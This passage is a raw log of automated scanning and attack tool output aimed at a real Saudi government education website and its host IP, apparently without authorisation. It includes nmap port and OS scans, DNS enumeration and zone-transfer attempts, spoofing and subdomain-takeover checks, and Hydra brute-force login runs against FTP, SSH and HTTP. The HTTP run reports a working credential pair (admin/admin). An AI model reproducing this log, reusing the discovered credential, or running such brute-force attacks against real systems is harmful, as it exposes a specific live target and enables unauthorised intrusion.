  1108. SF:t/images/firewall/line\.png'\);background-repeat:\x20no-repeat;backgrou
  1109. SF:nd-position:\x20left;}\thr{background-color:#E7E7E7;border:0;border-top
  1110. SF::1px\x20solid\x20#E7E7E7;height:0;margin:10px\x200\x2010px\x200;overflo
  1111. SF:w:hidden;}ul\x20{list-style:\x20square;color:\x20#0096D6;}li\x20{font-s
  1112. SF:ize:\x208pt;\x20}li\x20span\x20{color:\x20#666666;}</style>\r\r\n</head
  1113. SF:>\r\r\n<body>\r\r\n<center>\t\r\r\n<div\x20class=\"container\"><span\x2
  1114. SF:0style=\"float:left;\"><a\x20target=\"_blank\"\x20href=\"https://www\.d
  1115. SF:imofinf\.n");
  1116. ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
  1117. SF-Port8890-TCP:V=7.70%I=7%D=11/19%Time=5BF27D7A%P=x86_64-pc-linux-gnu%r(G
  1118. SF:enericLines,F19,"HTTP/1\.1\x20403\x20OK\r\nContent-type:\x20text/html\r
  1119. SF:\n\r\n<html>\r\r\n<head>\r\r\n<meta\x20http-equiv=\"Content-Type\"\x20c
  1120. SF:ontent=\"text/html;\x20charset=UTF-8\">\r\r\n<title>Unauthorized\x20Acc
  1121. SF:ess\x20-\x20Dimofinf\x20Technologies\x20Inc</title>\r\r\n<style\x20type
  1122. SF:=\"text/css\">body{background:#FAFAFA;color:#666666;}\.container\x20{co
  1123. SF:lor:#666666;margin:auto;width:950px;padding:\x200\x205px\x205px\x205px;
  1124. SF:}td{font-family:Tahoma,\x20Lucida\x20Grande,\x20sans-serif;font-size:8p
  1125. SF:t;text-shadow:\x201px\x201px\x200\x20#FFFFFF;}\.line{background-image:u
  1126. SF:rl\('http://www\.dimofinf\.net/images/firewall/line\.png'\);background-
  1127. SF:repeat:\x20no-repeat;background-position:\x20left;}\thr{background-colo
  1128. SF:r:#E7E7E7;border:0;border-top:1px\x20solid\x20#E7E7E7;height:0;margin:1
  1129. SF:0px\x200\x2010px\x200;overflow:hidden;}ul\x20{list-style:\x20square;col
  1130. SF:or:\x20#0096D6;}li\x20{font-size:\x208pt;\x20}li\x20span\x20{color:\x20
  1131. SF:#666666;}</style>\r\r\n</head>\r\r\n<body>\r\r\n<center>\t\r\r\n<div\x2
  1132. SF:0class=\"container\"><span\x20style=\"float:left;\"><a\x20target=\"_bla
  1133. SF:nk\"\x20href=\"https://www\.dimofinf\.n")%r(GetRequest,F19,"HTTP/1\.1\x
  1134. SF:20403\x20OK\r\nContent-type:\x20text/html\r\n\r\n<html>\r\r\n<head>\r\r
  1135. SF:\n<meta\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20chars
  1136. SF:et=UTF-8\">\r\r\n<title>Unauthorized\x20Access\x20-\x20Dimofinf\x20Tech
  1137. SF:nologies\x20Inc</title>\r\r\n<style\x20type=\"text/css\">body{backgroun
  1138. SF:d:#FAFAFA;color:#666666;}\.container\x20{color:#666666;margin:auto;widt
  1139. SF:h:950px;padding:\x200\x205px\x205px\x205px;}td{font-family:Tahoma,\x20L
  1140. SF:ucida\x20Grande,\x20sans-serif;font-size:8pt;text-shadow:\x201px\x201px
  1141. SF:\x200\x20#FFFFFF;}\.line{background-image:url\('http://www\.dimofinf\.n
  1142. SF:et/images/firewall/line\.png'\);background-repeat:\x20no-repeat;backgro
  1143. SF:und-position:\x20left;}\thr{background-color:#E7E7E7;border:0;border-to
  1144. SF:p:1px\x20solid\x20#E7E7E7;height:0;margin:10px\x200\x2010px\x200;overfl
  1145. SF:ow:hidden;}ul\x20{list-style:\x20square;color:\x20#0096D6;}li\x20{font-
  1146. SF:size:\x208pt;\x20}li\x20span\x20{color:\x20#666666;}</style>\r\r\n</hea
  1147. SF:d>\r\r\n<body>\r\r\n<center>\t\r\r\n<div\x20class=\"container\"><span\x
  1148. SF:20style=\"float:left;\"><a\x20target=\"_blank\"\x20href=\"https://www\.
  1149. SF:dimofinf\.n");
  1150. Aggressive OS guesses: Linux 3.10 - 4.11 (91%), HP P2000 G3 NAS device (90%), Linux 3.2 - 4.9 (90%), Linux 4.4 (89%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 3.18 (88%), Linux 2.6.32 - 3.13 (88%), Linux 3.0 - 3.2 (88%)
  1151. No exact OS matches for host (test conditions non-ideal).
  1152. Uptime guess: 8.866 days (since Sat Nov 10 07:23:56 2018)
  1153. Network Distance: 2 hops
  1154. TCP Sequence Prediction: Difficulty=264 (Good luck!)
  1155. IP ID Sequence Generation: All zeros
  1156.  
  1157. TRACEROUTE (using port 25/tcp)
  1158. HOP RTT ADDRESS
  1159. 1 121.45 ms 10.251.200.1
  1160. 2 121.44 ms 85.17.16.76
  1161.  
  1162. NSE: Script Post-scanning.
  1163. Initiating NSE at 04:11
  1164. Completed NSE at 04:11, 0.00s elapsed
  1165. Initiating NSE at 04:11
  1166. Completed NSE at 04:11, 0.00s elapsed
  1167. Read data files from: /usr/bin/../share/nmap
  1168. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1169. Nmap done: 1 IP address (1 host up) scanned in 233.83 seconds
  1170. Raw packets sent: 1023 (49.916KB) | Rcvd: 863 (403.816KB)
  1171. #######################################################################################################################################
  1172. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 04:11 EST
  1173. NSE: Loaded 148 scripts for scanning.
  1174. NSE: Script Pre-scanning.
  1175. Initiating NSE at 04:11
  1176. Completed NSE at 04:11, 0.00s elapsed
  1177. Initiating NSE at 04:11
  1178. Completed NSE at 04:11, 0.00s elapsed
  1179. Initiating Parallel DNS resolution of 1 host. at 04:11
  1180. Completed Parallel DNS resolution of 1 host. at 04:11, 16.50s elapsed
  1181. Initiating UDP Scan at 04:11
  1182. Scanning 85.17.16.76 [14 ports]
  1183. Completed UDP Scan at 04:11, 2.13s elapsed (14 total ports)
  1184. Initiating Service scan at 04:11
  1185. Scanning 12 services on 85.17.16.76
  1186. Service scan Timing: About 8.33% done; ETC: 04:31 (0:17:58 remaining)
  1187. Completed Service scan at 04:13, 102.58s elapsed (12 services on 1 host)
  1188. Initiating OS detection (try #1) against 85.17.16.76
  1189. Retrying OS detection (try #2) against 85.17.16.76
  1190. Initiating Traceroute at 04:13
  1191. Completed Traceroute at 04:13, 7.20s elapsed
  1192. Initiating Parallel DNS resolution of 1 host. at 04:13
  1193. Completed Parallel DNS resolution of 1 host. at 04:14, 16.50s elapsed
  1194. NSE: Script scanning 85.17.16.76.
  1195. Initiating NSE at 04:14
  1196. Completed NSE at 04:14, 20.36s elapsed
  1197. Initiating NSE at 04:14
  1198. Completed NSE at 04:14, 1.03s elapsed
  1199. Nmap scan report for 85.17.16.76
  1200. Host is up (0.12s latency).
  1201.  
  1202. PORT STATE SERVICE VERSION
  1203. 53/udp open|filtered domain
  1204. 67/udp open|filtered dhcps
  1205. 68/udp open|filtered dhcpc
  1206. 69/udp open|filtered tftp
  1207. 88/udp open|filtered kerberos-sec
  1208. 123/udp open|filtered ntp
  1209. 137/udp filtered netbios-ns
  1210. 138/udp filtered netbios-dgm
  1211. 139/udp open|filtered netbios-ssn
  1212. 161/udp open|filtered snmp
  1213. 162/udp open|filtered snmptrap
  1214. 389/udp open|filtered ldap
  1215. 520/udp open|filtered route
  1216. 2049/udp open|filtered nfs
  1217. Too many fingerprints match this host to give specific OS details
  1218.  
  1219. TRACEROUTE (using port 138/udp)
  1220. HOP RTT ADDRESS
  1221. 1 119.71 ms 10.251.200.1
  1222. 2 ... 3
  1223. 4 120.04 ms 10.251.200.1
  1224. 5 121.68 ms 10.251.200.1
  1225. 6 121.66 ms 10.251.200.1
  1226. 7 121.65 ms 10.251.200.1
  1227. 8 121.71 ms 10.251.200.1
  1228. 9 121.69 ms 10.251.200.1
  1229. 10 121.68 ms 10.251.200.1
  1230. 11 ... 18
  1231. 19 125.07 ms 10.251.200.1
  1232. 20 128.59 ms 10.251.200.1
  1233. 21 ... 27
  1234. 28 120.85 ms 10.251.200.1
  1235. 29 ...
  1236. 30 120.01 ms 10.251.200.1
  1237.  
  1238. NSE: Script Post-scanning.
  1239. Initiating NSE at 04:14
  1240. Completed NSE at 04:14, 0.00s elapsed
  1241. Initiating NSE at 04:14
  1242. Completed NSE at 04:14, 0.00s elapsed
  1243. Read data files from: /usr/bin/../share/nmap
  1244. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1245. Nmap done: 1 IP address (1 host up) scanned in 171.51 seconds
  1246. Raw packets sent: 147 (9.964KB) | Rcvd: 1007 (500.157KB)
  1247. #######################################################################################################################################
  1248. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 04:14 EST
  1249. Nmap scan report for 85.17.16.76
  1250. Host is up (0.12s latency).
  1251. Not shown: 19 filtered ports, 3 closed ports
  1252. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1253. PORT STATE SERVICE
  1254. 21/tcp open ftp
  1255. 22/tcp open ssh
  1256. 80/tcp open http
  1257. 443/tcp open https
  1258. #######################################################################################################################################
  1259.  
  1260. + -- --=[Port 21 opened... running tests...
  1261. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1262.  
  1263. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:14:41
  1264. [DATA] max 1 task per 1 server, overall 1 task, 225 login tries, ~225 tries per task
  1265. [DATA] attacking ftp://85.17.16.76:21/
  1266. [STATUS] 78.00 tries/min, 78 tries in 00:01h, 150 to do in 00:02h, 1 active
  1267. 1 of 1 target completed, 0 valid passwords found
  1268. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 04:17:35
  1269. + -- --=[Port 22 opened... running tests...
  1270. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1271.  
  1272. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:17:35
  1273. [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
  1274. [DATA] attacking ssh://85.17.16.76:22/
  1275. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1276.  
  1277. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:17:36
  1278. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  1279. [DATA] attacking ssh://85.17.16.76:22/
  1280. + -- --=[Port 23 closed... skipping.
  1281. + -- --=[Port 25 closed... skipping.
  1282. + -- --=[Port 80 opened... running tests...
  1283. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1284.  
  1285. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:17:36
  1286. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  1287. [DATA] attacking http-get://85.17.16.76:80//
  1288. [80][http-get] host: 85.17.16.76 login: admin password: admin
  1289. [STATUS] attack finished for 85.17.16.76 (valid pair found)
  1290. 1 of 1 target successfully completed, 1 valid password found
  1291. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 04:17:37
  1292. + -- --=[Port 110 closed... skipping.
  1293. + -- --=[Port 139 closed... skipping.
  1294. + -- --=[Port 162 closed... skipping.
  1295. + -- --=[Port 389 closed... skipping.
  1296. + -- --=[Port 443 opened... running tests...
  1297. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1298.  
  1299. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:17:37
  1300. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  1301. [DATA] attacking http-gets://85.17.16.76:443//
  1302. [STATUS] 103.00 tries/min, 103 tries in 00:01h, 1430 to do in 00:14h, 1 active
  1303. [STATUS] 101.00 tries/min, 303 tries in 00:03h, 1230 to do in 00:13h, 1 active
  1304. [STATUS] 93.57 tries/min, 655 tries in 00:07h, 878 to do in 00:10h, 1 active
  1305. [STATUS] 91.08 tries/min, 1093 tries in 00:12h, 440 to do in 00:05h, 1 active
  1306. [STATUS] 90.06 tries/min, 1531 tries in 00:17h, 2 to do in 00:01h, 1 active
  1307. 1 of 1 target completed, 0 valid passwords found
  1308. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 04:34:39
  1309. + -- --=[Port 445 closed... skipping.
  1310. + -- --=[Port 512 closed... skipping.
  1311. + -- --=[Port 513 closed... skipping.
  1312. + -- --=[Port 514 closed... skipping.
  1313. + -- --=[Port 993 closed... skipping.
  1314. + -- --=[Port 1433 closed... skipping.
  1315. + -- --=[Port 1521 closed... skipping.
  1316. + -- --=[Port 3306 closed... skipping.
  1317. + -- --=[Port 3389 closed... skipping.
  1318. + -- --=[Port 5432 closed... skipping.
  1319. + -- --=[Port 5900 closed... skipping.
  1320. + -- --=[Port 5901 closed... skipping.
  1321. + -- --=[Port 8000 closed... skipping.
  1322. + -- --=[Port 8080 closed... skipping.
  1323. + -- --=[Port 8100 closed... skipping.
  1324. + -- --=[Port 6667 closed... skipping.
  1325. #######################################################################################################################################
  1326. dnsenum VERSION:1.2.4
  1327.  
  1328. ----- www.hbthedu.gov.sa -----
  1329.  
  1330.  
  1331. Host's addresses:
  1332. __________________
  1333.  
  1334. hbthedu.gov.sa. 13906 IN A 85.17.16.76
  1335.  
  1336.  
  1337. Name Servers:
  1338. ______________
  1339.  
  1340. ns1.dimofinf.net. 174 IN A 45.55.127.247
  1341. ns2.dimofinf.net. 300 IN A 167.99.30.33
  1342. ns3.dimofinf.net. 300 IN A 95.179.144.169
  1343.  
  1344.  
  1345. Mail (MX) Servers:
  1346. ___________________
  1347.  
  1348. aspmx.l.google.com. 293 IN A 64.233.167.26
  1349. alt3.aspmx.l.google.com. 293 IN A 108.177.125.26
  1350. alt2.aspmx.l.google.com. 293 IN A 172.217.194.26
  1351. alt4.aspmx.l.google.com. 293 IN A 74.125.195.26
  1352. alt1.aspmx.l.google.com. 279 IN A 64.233.164.26
  1353.  
  1354.  
  1355. Trying Zone Transfers and getting Bind Versions:
  1356. _________________________________________________
  1357.  
  1358.  
  1359. Trying Zone Transfer for www.hbthedu.gov.sa on ns1.dimofinf.net ...
  1360.  
  1361. Trying Zone Transfer for www.hbthedu.gov.sa on ns2.dimofinf.net ...
  1362.  
  1363. Trying Zone Transfer for www.hbthedu.gov.sa on ns3.dimofinf.net ...
  1364.  
  1365. brute force file not specified, bay.
  1366. #######################################################################################################################################
  1367.  
  1368. Running Source: Ask
  1369. Running Source: Archive.is
  1370. Running Source: Baidu
  1371. Running Source: Bing
  1372. Running Source: CertDB
  1373. Running Source: CertificateTransparency
  1374. Running Source: Certspotter
  1375. Running Source: Commoncrawl
  1376. Running Source: Crt.sh
  1377. Running Source: Dnsdb
  1378. Running Source: DNSDumpster
  1379. Running Source: DNSTable
  1380. Running Source: Dogpile
  1381. Running Source: Exalead
  1382. Running Source: Findsubdomains
  1383. Running Source: Googleter
  1384. Running Source: Hackertarget
  1385. Running Source: Ipv4Info
  1386. Running Source: PTRArchive
  1387. Running Source: Sitedossier
  1388. Running Source: Threatcrowd
  1389. Running Source: ThreatMiner
  1390. Running Source: WaybackArchive
  1391. Running Source: Yahoo
  1392.  
  1393. Running enumeration on www.hbthedu.gov.sa
  1394.  
  1395. dnsdb: Unexpected return status 503
  1396.  
  1397. waybackarchive: Get https://web.archive.org/cdx/search/cdx?url=*.www.hbthedu.gov.sa/*&output=json&fl=original&collapse=urlkey&page=: net/http: invalid header field value "http://web.archive.org/cdx/search/cdx?url=*.www.hbthedu.gov.sa/*&output=json&fl=original&collapse=urlkey&page=\x00" for key Referer
  1398.  
  1399.  
  1400. Starting Bruteforcing of www.hbthedu.gov.sa with 9985 words
  1401.  
  1402. Total 1 Unique subdomains found for www.hbthedu.gov.sa
  1403.  
  1404. .www.hbthedu.gov.sa
  1405. #######################################################################################################################################
  1406. [*] Processing domain www.hbthedu.gov.sa
  1407. [+] Getting nameservers
  1408. 45.55.127.247 - ns1.dimofinf.net
  1409. 95.179.144.169 - ns3.dimofinf.net
  1410. 167.99.30.33 - ns2.dimofinf.net
  1411. [-] Zone transfer failed
  1412.  
  1413. [+] MX records found, added to target list
  1414. 1 aspmx.l.google.com.
  1415. 10 alt3.aspmx.l.google.com.
  1416. 5 alt2.aspmx.l.google.com.
  1417. 10 alt4.aspmx.l.google.com.
  1418. 5 alt1.aspmx.l.google.com.
  1419.  
  1420. [*] Scanning www.hbthedu.gov.sa for A records
  1421. 85.17.16.76 - www.hbthedu.gov.sa
  1422.  
  1423. #######################################################################################################################################
  1424. [+] www.hbthedu.gov.sa has no SPF record!
  1425. [*] No DMARC record found. Looking for organizational record
  1426. [+] No organizational DMARC record
  1427. [+] Spoofing possible for www.hbthedu.gov.sa!
  1428. #######################################################################################################################################
  1429. ____ _____ ___ ______ _/ /_____ ____ ___
  1430. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  1431. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  1432. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  1433. /_/ discover v0.5.0 - by @michenriksen
  1434.  
  1435. Identifying nameservers for www.hbthedu.gov.sa... Done
  1436. Using nameservers:
  1437.  
  1438. - 45.55.127.247
  1439. - 95.179.144.169
  1440. - 167.99.30.33
  1441.  
  1442. Checking for wildcard DNS... Done
  1443.  
  1444. Running collector: Threat Crowd... Done (0 hosts)
  1445. Running collector: DNSDB... Error
  1446. -> DNSDB returned unexpected response code: 503
  1447. Running collector: Netcraft... Done (0 hosts)
  1448. Running collector: PublicWWW... Done (0 hosts)
  1449. Running collector: Censys... Skipped
  1450. -> Key 'censys_secret' has not been set
  1451. Running collector: Wayback Machine... Done (2 hosts)
  1452. Running collector: PTRArchive... Error
  1453. -> PTRArchive returned unexpected response code: 502
  1454. Running collector: PassiveTotal... Skipped
  1455. -> Key 'passivetotal_key' has not been set
  1456. Running collector: Shodan... Skipped
  1457. -> Key 'shodan' has not been set
  1458. Running collector: Riddler... Skipped
  1459. -> Key 'riddler_username' has not been set
  1460. Running collector: VirusTotal... Skipped
  1461. -> Key 'virustotal' has not been set
  1462. Running collector: Dictionary... Done (0 hosts)
  1463. Running collector: HackerTarget... Done (1 host)
  1464. Running collector: Google Transparency Report... Done (0 hosts)
  1465. Running collector: Certificate Search... Done (0 hosts)
  1466.  
  1467. Resolving 2 unique hosts...
  1468. 85.17.16.76 hbthedu.gov.sa
  1469. 85.17.16.76 www.hbthedu.gov.sa
  1470.  
  1471. Found subnets:
  1472.  
  1473. - 85.17.16.0-255 : 2 hosts
  1474.  
  1475. Wrote 2 hosts to:
  1476.  
  1477. - file:///root/aquatone/www.hbthedu.gov.sa/hosts.txt
  1478. - file:///root/aquatone/www.hbthedu.gov.sa/hosts.json
  1479. __
  1480. ____ _____ ___ ______ _/ /_____ ____ ___
  1481. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  1482. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  1483. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  1484. /_/ takeover v0.5.0 - by @michenriksen
  1485.  
  1486. Loaded 2 hosts from /root/aquatone/www.hbthedu.gov.sa/hosts.json
  1487. Loaded 25 domain takeover detectors
  1488.  
  1489. Identifying nameservers for www.hbthedu.gov.sa... Done
  1490. Using nameservers:
  1491.  
  1492. - 45.55.127.247
  1493. - 95.179.144.169
  1494. - 167.99.30.33
  1495.  
  1496. Checking hosts for domain takeover vulnerabilities...
  1497.  
  1498. Finished checking hosts:
  1499.  
  1500. - Vulnerable : 0
  1501. - Not Vulnerable : 2
  1502.  
  1503. Wrote 0 potential subdomain takeovers to:
  1504.  
  1505. - file:///root/aquatone/www.hbthedu.gov.sa/takeovers.json
  1506.  
  1507. __
  1508. ____ _____ ___ ______ _/ /_____ ____ ___
  1509. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  1510. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  1511. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  1512. /_/ scan v0.5.0 - by @michenriksen
  1513.  
  1514. Loaded 2 hosts from /root/aquatone/www.hbthedu.gov.sa/hosts.json
  1515.  
  1516. Probing 2 ports...
  1517. 80/tcp 85.17.16.76 hbthedu.gov.sa, www.hbthedu.gov.sa
  1518. 443/tcp 85.17.16.76 hbthedu.gov.sa, www.hbthedu.gov.sa
  1519.  
  1520. Wrote open ports to file:///root/aquatone/www.hbthedu.gov.sa/open_ports.txt
  1521. Wrote URLs to file:///root/aquatone/www.hbthedu.gov.sa/urls.txt
  1522. __
  1523. ____ _____ ___ ______ _/ /_____ ____ ___
  1524. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  1525. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  1526. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  1527. /_/ gather v0.5.0 - by @michenriksen
  1528.  
  1529. Processing 4 pages...
  1530.  
  1531. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
  1532. #######################################################################################################################################
  1533. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:59 EST
  1534. Nmap scan report for www.hbthedu.gov.sa (85.17.16.76)
  1535. Host is up (0.13s latency).
  1536. Not shown: 467 filtered ports, 3 closed ports
  1537. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1538. PORT STATE SERVICE
  1539. 21/tcp open ftp
  1540. 22/tcp open ssh
  1541. 80/tcp open http
  1542. 443/tcp open https
  1543. 8888/tcp open sun-answerbook
  1544. 8890/tcp open ddi-tcp-3
  1545. #######################################################################################################################################
  1546. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:59 EST
  1547. Nmap scan report for www.hbthedu.gov.sa (85.17.16.76)
  1548. Host is up (0.12s latency).
  1549. Not shown: 2 filtered ports
  1550. PORT STATE SERVICE
  1551. 53/udp open|filtered domain
  1552. 67/udp open|filtered dhcps
  1553. 68/udp open|filtered dhcpc
  1554. 69/udp open|filtered tftp
  1555. 88/udp open|filtered kerberos-sec
  1556. 123/udp open|filtered ntp
  1557. 139/udp open|filtered netbios-ssn
  1558. 161/udp open|filtered snmp
  1559. 162/udp open|filtered snmptrap
  1560. 389/udp open|filtered ldap
  1561. 520/udp open|filtered route
  1562. 2049/udp open|filtered nfs
  1563. #######################################################################################################################################
  1564. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 04:00 EST
  1565. Nmap scan report for www.hbthedu.gov.sa (85.17.16.76)
  1566. Host is up (0.13s latency).
  1567.  
  1568. PORT STATE SERVICE VERSION
  1569. 21/tcp open ftp?
  1570. | fingerprint-strings:
  1571. | GenericLines, GetRequest, Help, NULL:
  1572. | Your connection to this server has been blocked in this network firewall.
  1573. | need to contact the network admin at [security@dimofinf.net] for further information.
  1574. | Your blocked IP address is 194.187.249.229.
  1575. | This server's hostname is unlimited6.dimofinf.net.
  1576. | more information visit: https://www.dimofinf.net/knowledgebase.php?action=displayarticle&id=446
  1577. |_ Dimofinf Technologies Inc.
  1578. |_ftp-bounce: ERROR: Script execution failed (use -d to debug)
  1579. | ftp-brute:
  1580. | Accounts: No valid accounts found
  1581. |_ Statistics: Performed 1456 guesses in 185 seconds, average tps: 8.5
  1582. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  1583. SF-Port21-TCP:V=7.70%I=7%D=11/19%Time=5BF27BA6%P=x86_64-pc-linux-gnu%r(NUL
  1584. SF:L,18A,"Your\x20connection\x20to\x20this\x20server\x20has\x20been\x20blo
  1585. SF:cked\x20in\x20this\x20network\x20firewall\.\r\nYou\x20need\x20to\x20con
  1586. SF:tact\x20the\x20network\x20admin\x20at\x20\[security@dimofinf\.net\]\x20
  1587. SF:for\x20further\x20information\.\r\nYour\x20blocked\x20IP\x20address\x20
  1588. SF:is\x20194\.187\.249\.229\.\r\nThis\x20server's\x20hostname\x20is\x20unl
  1589. SF:imited6\.dimofinf\.net\.\r\nFor\x20more\x20information\x20visit:\x20htt
  1590. SF:ps://www\.dimofinf\.net/knowledgebase\.php\?action=displayarticle&id=44
  1591. SF:6\r\n\r\nDimofinf\x20Technologies\x20Inc\.\r\n")%r(GenericLines,18A,"Yo
  1592. SF:ur\x20connection\x20to\x20this\x20server\x20has\x20been\x20blocked\x20i
  1593. SF:n\x20this\x20network\x20firewall\.\r\nYou\x20need\x20to\x20contact\x20t
  1594. SF:he\x20network\x20admin\x20at\x20\[security@dimofinf\.net\]\x20for\x20fu
  1595. SF:rther\x20information\.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194
  1596. SF:\.187\.249\.229\.\r\nThis\x20server's\x20hostname\x20is\x20unlimited6\.
  1597. SF:dimofinf\.net\.\r\nFor\x20more\x20information\x20visit:\x20https://www\
  1598. SF:.dimofinf\.net/knowledgebase\.php\?action=displayarticle&id=446\r\n\r\n
  1599. SF:Dimofinf\x20Technologies\x20Inc\.\r\n")%r(Help,18A,"Your\x20connection\
  1600. SF:x20to\x20this\x20server\x20has\x20been\x20blocked\x20in\x20this\x20netw
  1601. SF:ork\x20firewall\.\r\nYou\x20need\x20to\x20contact\x20the\x20network\x20
  1602. SF:admin\x20at\x20\[security@dimofinf\.net\]\x20for\x20further\x20informat
  1603. SF:ion\.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194\.187\.249\.229\.
  1604. SF:\r\nThis\x20server's\x20hostname\x20is\x20unlimited6\.dimofinf\.net\.\r
  1605. SF:\nFor\x20more\x20information\x20visit:\x20https://www\.dimofinf\.net/kn
  1606. SF:owledgebase\.php\?action=displayarticle&id=446\r\n\r\nDimofinf\x20Techn
  1607. SF:ologies\x20Inc\.\r\n")%r(GetRequest,18A,"Your\x20connection\x20to\x20th
  1608. SF:is\x20server\x20has\x20been\x20blocked\x20in\x20this\x20network\x20fire
  1609. SF:wall\.\r\nYou\x20need\x20to\x20contact\x20the\x20network\x20admin\x20at
  1610. SF:\x20\[security@dimofinf\.net\]\x20for\x20further\x20information\.\r\nYo
  1611. SF:ur\x20blocked\x20IP\x20address\x20is\x20194\.187\.249\.229\.\r\nThis\x2
  1612. SF:0server's\x20hostname\x20is\x20unlimited6\.dimofinf\.net\.\r\nFor\x20mo
  1613. SF:re\x20information\x20visit:\x20https://www\.dimofinf\.net/knowledgebase
  1614. SF:\.php\?action=displayarticle&id=446\r\n\r\nDimofinf\x20Technologies\x20
  1615. SF:Inc\.\r\n");
  1616. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1617. Device type: general purpose|specialized|storage-misc
  1618. Running (JUST GUESSING): Linux 3.X|4.X (91%), Crestron 2-Series (87%), HP embedded (85%), Oracle VM Server 3.X (85%)
  1619. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:oracle:vm_server:3.4.2 cpe:/o:linux:linux_kernel:4.1
  1620. Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.18 (89%), Crestron XPanel control system (87%), Linux 3.16 (86%), HP P2000 G3 NAS device (85%), Oracle VM Server 3.4.2 (Linux 4.1) (85%)
  1621. No exact OS matches for host (test conditions non-ideal).
  1622. Network Distance: 9 hops
  1623.  
  1624. TRACEROUTE (using port 21/tcp)
  1625. HOP RTT ADDRESS
  1626. 1 120.85 ms 10.251.200.1
  1627. 2 120.90 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
  1628. 3 130.52 ms 82.102.29.40
  1629. 4 130.56 ms 176.10.83.5
  1630. 5 133.03 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
  1631. 6 132.65 ms ae-104.br01.ams-01.nl.leaseweb.net (31.31.38.141)
  1632. 7 132.61 ms 81.17.34.17
  1633. 8 131.99 ms po-1005.ce02.ams-01.nl.leaseweb.net (81.17.33.141)
  1634. 9 131.97 ms 85.17.16.76
  1635. ########################################################################################################################################
  1636. (gen) header: Your connection to this server has been blocked in this network firewall.
  1637. You need to contact the network admin at [security@dimofinf.net] for further information.
  1638. Your blocked IP address is 194.187.249.229.
  1639. This server's hostname is unlimited6.dimofinf.net.
  1640. For more information visit: https://www.dimofinf.net/knowledgebase.php?action=displayarticle&id=446
  1641. Dimofinf Technologies Inc.
  1642.  
  1643. [
  1644.  
  1645. ^ ^
  1646. _ __ _ ____ _ __ _ _ ____
  1647. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1648. | V V // o // _/ | V V // 0 // 0 // _/
  1649. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1650. <
  1651. ...'
  1652.  
  1653. WAFW00F - Web Application Firewall Detection Tool
  1654.  
  1655. By Sandro Gauci && Wendel G. Henrique
  1656.  
  1657. Checking http://www.hbthedu.gov.sa
  1658. Generic Detection results:
  1659. No WAF detected by the generic detection
  1660. Number of requests: 14
  1661. #######################################################################################################################################
